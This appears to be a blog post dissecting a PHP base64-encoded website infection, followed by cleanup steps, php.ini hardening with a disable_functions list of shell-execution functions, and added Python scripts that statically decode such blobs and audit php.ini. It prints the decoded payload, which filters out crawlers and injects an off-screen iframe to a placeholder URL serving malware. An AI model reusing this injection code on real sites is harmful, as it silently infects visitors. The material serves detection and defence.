PHP Base64 Virus

You may or may not have heard of it, but it’s out there…
The virus looks something like this:


<?php
    $auth_pass = "133a113117ca7d73b44ad035e570e67b";
    // the real body: a PHP script compressed with gzdeflate() and then base64-encoded (shortened here)
    $virusaworm = "7X17e9q48xyv9ESAk ... maCymQa9uHCk7";
    // $script is never assigned in the captured sample, so this line evaluates an empty string
    eval(base64_decode($script));
    // unpack the blob and run it; the @ hides any error that would reveal the infection
    @eval(gzinflate(base64_decode($virusaworm)));
?>

And (almost) every PHP file will contain this after being infected:

<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDA ... XY+JzsNCn0='));

The actual code:

<?php
error_reporting(0);   // hide PHP errors from the visitor and from the log
$bot = FALSE ;
// User-Agent fragments that identify crawlers and validators: those never get the iframe
$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp',
...  'wordpress','rssreader','mybloglog api');
// (first, last) address pairs the malware treats as crawler ranges
$stop_ips_masks = array(
    array("216.239.32.0","216.239.63.255"),
    ...
    array("38.0.0.0","38.255.255.255")
    );
// ip2long() can return a negative number on 32-bit builds; "%u" forces an unsigned value
$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));
foreach ( $stop_ips_masks as $IPs ) {
    $first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));
    if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
}
foreach ($user_agent_to_filter as $bot_sign){
    if  (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}
}
// only real visitors get the 2x2 iframe, pushed far off-screen so nothing is visible
if (!$bot) {
    echo '<div style="position: absolute; left: -1999px; top: -2999px;">
            <ΙFRAME src="http://example.org/QQkcEAAcDAAMBBw==" width="2" height="2"></ΙFRAME>
        </div>';
}

This means that every page carrying this code serves an invisible iframe, but only to visitors that are not recognised as bots by IP range or User-Agent.
The page loaded in that iframe serves malware that infects the visitor.

How do we get rid of it?

In your webroot put a .htaccess file with the following content, so that nobody but you can reach the site while it is being cleaned:
order deny,allow
deny from all
allow from 127.0.0.1

Now upload Trinetra v 2.0 to your webroot and execute trinetra-cleaner2.php (locally, since 127.0.0.1 is the only address the .htaccess above still lets through).

After you’ve done all the steps to prevent this from happening again, delete the .htaccess file.
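As an added example (not code from the post, and not part of Trinetra), the following Python script does the "find the infected files" half of the cleanup statically: it recognises both eval(base64_decode(...)) shapes shown above in PHP source, resolves the variable-held blob of the dropper variant, unpacks the payload with base64 and raw inflate (what PHP's gzinflate() does) without ever executing it, and flags payloads that inject an off-screen iframe. The infected samples it runs on are constructed here around a harmless stand-in payload; the regular expressions and function names are this example's own.

```python
import base64
import binascii
import re
import zlib
from typing import Optional

# Constructed samples (not real malware): the same wrapping the post shows around a harmless
# stand-in payload that only echoes a hidden iframe pointing at the post's example.org URL.
STANDIN_PAYLOAD = (
    "error_reporting(0);\n"
    "echo '<div style=\"position: absolute; left: -1999px; top: -2999px;\">"
    "<iframe src=\"http://example.org/QQkcEAAcDAAMBBw==\" width=\"2\" height=\"2\"></iframe></div>';"
)


def _gzdeflate(data: bytes) -> bytes:
    """Raw DEFLATE with no zlib/gzip header: what PHP's gzdeflate() writes and gzinflate() reads."""
    comp = zlib.compressobj(level=9, wbits=-15)
    return comp.compress(data) + comp.flush()


def _b64(data: bytes) -> str:
    return base64.b64encode(data).decode("ascii")


# Variant 1: the one-liner prepended to (almost) every PHP file.
SAMPLE_ONELINER = "<?php eval(base64_decode('" + _b64(STANDIN_PAYLOAD.encode()) + "'));\n"

# Variant 2: the dropper, deflated then base64-encoded into a variable that gzinflate() unpacks.
SAMPLE_DROPPER = (
    "<?php\n"
    '    $virusaworm = "' + _b64(_gzdeflate(STANDIN_PAYLOAD.encode())) + '";\n'
    "    @eval(gzinflate(base64_decode($virusaworm)));\n"
    "?>\n"
)

# A legitimate use of base64_decode() without eval(): must not be flagged.
SAMPLE_CLEAN = "<?php\n$token = base64_decode($_GET['t']);\necho htmlspecialchars($token);\n"

# eval(base64_decode('<literal>'))
EVAL_LITERAL_RE = re.compile(
    r"@?eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)", re.I)
# eval(gzinflate(base64_decode($var)))
EVAL_GZ_VAR_RE = re.compile(
    r"@?eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*\$(\w+)\s*\)\s*\)\s*\)", re.I)
# $var = '<literal>'; so the variable used above can be resolved to its blob
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*['\"]([A-Za-z0-9+/=\s]*)['\"]\s*;")


def decode_blob(blob: str, inflate: bool) -> Optional[str]:
    """Unpack a blob the way the malware would at runtime, but never execute the result."""
    try:
        raw = base64.b64decode(re.sub(r"\s+", "", blob), validate=True)
        if inflate:
            raw = zlib.decompress(raw, wbits=-15)
        return raw.decode("utf-8", errors="replace")
    except (binascii.Error, zlib.error):
        return None  # not a real blob, or a different packer than the one the post shows


def scan_php(source: str) -> list:
    """One finding per eval(base64_decode(...)) construct, with its statically decoded payload."""
    findings = []
    for m in EVAL_LITERAL_RE.finditer(source):
        findings.append({"kind": "eval_base64_literal", "variable": None,
                         "decoded": decode_blob(m.group(1), inflate=False)})
    assignments = dict(ASSIGN_RE.findall(source))
    for m in EVAL_GZ_VAR_RE.finditer(source):
        blob = assignments.get(m.group(1))
        findings.append({"kind": "eval_gzinflate_var", "variable": m.group(1),
                         "decoded": decode_blob(blob, inflate=True) if blob is not None else None})
    for f in findings:
        text = f["decoded"] or ""
        # the post's payload hides the iframe by pushing its container far off-screen
        f["hidden_iframe"] = bool(re.search(r"<\s*iframe", text, re.I)) and "left: -" in text
    return findings


if __name__ == "__main__":
    for name, src in (("one-liner", SAMPLE_ONELINER), ("dropper", SAMPLE_DROPPER), ("clean", SAMPLE_CLEAN)):
        hits = scan_php(src)
        print(name, "->", [(f["kind"], f["hidden_iframe"]) for f in hits] or "clean")
```

To run it over a real webroot, read each .php file and pass its contents to scan_php(); a non-empty result is a file to restore from a known-good copy rather than to patch by hand, because the one-liner is usually not the only thing the dropper changed.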

How do we prevent it?

In your php.ini file put the following lines:
allow_url_fopen = off
allow_url_include = off
disable_functions = "apache_child_terminate, apache_setenv, define_syslog_variables, escapeshellarg, escapeshellcmd, eval, exec, fp, fput, ftp_connect, ftp_exec, ftp_get, ftp_login, ftp_nb_fput, ftp_put, ftp_raw, ftp_rawlist, highlight_file, ini_alter, ini_get_all, ini_restore, inject_code, mysql_pconnect, openlog, passthru, php_uname, phpAds_remoteInfo, phpAds_XmlRpc, phpAds_xmlrpcDecode, phpAds_xmlrpcEncode, popen, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_setuid, posix_uname, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, shell_exec, syslog, system, xmlrpc_entity_decode"

Remove from that list any functions you do need; some template systems, for example, use eval().
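An added example, not from the post: a small Python audit that parses a php.ini fragment and checks the three directives above against a baseline, handling the several spellings PHP accepts for a boolean ini value (On/Off, 1/0, true/false, yes/no). The two ini fragments are constructed, and the baseline set of functions is this example's own shortlist from the list above. It also reports, as a note rather than a failure, that listing eval in disable_functions has no effect, because eval is a language construct in PHP rather than a function.

```python
import re

# Constructed php.ini fragments (hypothetical): a typical pre-hardening state beside the post's settings.
WEAK_INI = """
; constructed php.ini before hardening
allow_url_fopen = On
allow_url_include = On
disable_functions =
"""

HARDENED_INI = """
; constructed php.ini after applying the post's settings (list shortened)
allow_url_fopen = off
allow_url_include = off
disable_functions = "exec, passthru, shell_exec, system, proc_open, popen, eval"
"""

# Spellings PHP treats as false for a boolean ini value; anything else is true.
FALSE_VALUES = {"", "0", "off", "false", "no", "none"}

# PHP's own defaults when the directive is absent from php.ini.
DEFAULTS = {"allow_url_fopen": "1", "allow_url_include": "0", "disable_functions": ""}

# This example's own shortlist of the command-execution functions from the post's list.
MUST_BE_DISABLED = {"exec", "passthru", "shell_exec", "system", "proc_open", "popen"}


def parse_php_ini(text: str) -> dict:
    """Minimal php.ini reader: key = value per line, ';' comments, optional quotes around values."""
    settings = {}
    for line in text.splitlines():
        line = line.split(";", 1)[0].strip()
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        settings[key.strip().lower()] = value.strip().strip('"').strip("'")
    return settings


def ini_bool(value: str) -> bool:
    return value.strip().lower() not in FALSE_VALUES


def audit(settings: dict) -> dict:
    """Compare parsed settings with the post's recommendations; returns problems and notes."""
    cfg = {**DEFAULTS, **settings}
    problems, notes = [], []
    if ini_bool(cfg["allow_url_fopen"]):
        problems.append("allow_url_fopen is on: fopen()/file_get_contents() can fetch remote URLs")
    if ini_bool(cfg["allow_url_include"]):
        problems.append("allow_url_include is on: include/require can load code from remote URLs")
    disabled = {f.strip().lower() for f in cfg["disable_functions"].split(",") if f.strip()}
    missing = sorted(MUST_BE_DISABLED - disabled)
    if missing:
        problems.append("disable_functions lacks: " + ", ".join(missing))
    if "eval" in disabled:
        # eval is a language construct, not a function, so disable_functions does not affect it
        notes.append("eval listed in disable_functions has no effect; use Suhosin's eval controls instead")
    return {"problems": problems, "notes": notes}


if __name__ == "__main__":
    for label, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(label, audit(parse_php_ini(ini)))
```

Point it at the output of `php --ini` on the server rather than at a copy in the repository: the file PHP actually loads, plus any per-directory overrides, is what decides whether the uploaded payload can run.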

Change your file permissions!

Install and configure suhosin. It lets you whitelist the functions allowed inside eval(), so that functions like base64_decode can never execute there.
In that case, even if some bot manages to upload the payload, it cannot run correctly.

Interesting readings

http://www.cyberciti.biz/tips/php-security-best-practices-tutorial.html
http://www.webdigi.co.uk/blog/2009/how-to-detect-if-your-webserver-is-hacked-and-get-alerted/


